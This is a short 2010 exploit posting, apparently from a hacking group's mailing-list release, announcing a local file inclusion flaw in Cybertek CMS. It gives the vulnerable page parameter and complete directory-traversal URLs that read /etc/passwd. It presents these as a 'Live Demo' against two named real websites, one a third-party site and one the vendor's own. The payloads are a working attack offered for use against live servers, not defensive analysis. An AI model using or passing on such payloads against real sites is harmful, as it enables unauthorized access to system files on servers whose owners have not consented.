======================================================= Cybertek CMS Local File Include Vulnerability ======================================================= ######################################## # Name: Cybertek CMS Local File Include Vulnerability # Vendor: www.cybertek.co.za # Date: 2010/05/16 # Author: Ashiyane Digital Security Team # Discovered: XroGuE # Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members # Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com ######################################## ######################################## [+] Vulnerability: [+] Exploit: www.Site.com/[path]/index.php?page=[LFI] [+] Live Demo: http://www.keter.co.za/index.php?page=../../../../../../../../../../../etc/passwd ~> Vendor Vulnerability: [+] Vendor: http://www.cybertek.co.za/index.php?page=../../../../../../../../../../../etc/passwd [+] Done ... ! :)) ######################################## _________________________________________________________________ Hotmail: Trusted email with powerful SPAM protection. https://signup.live.com/signup.aspx?id=60969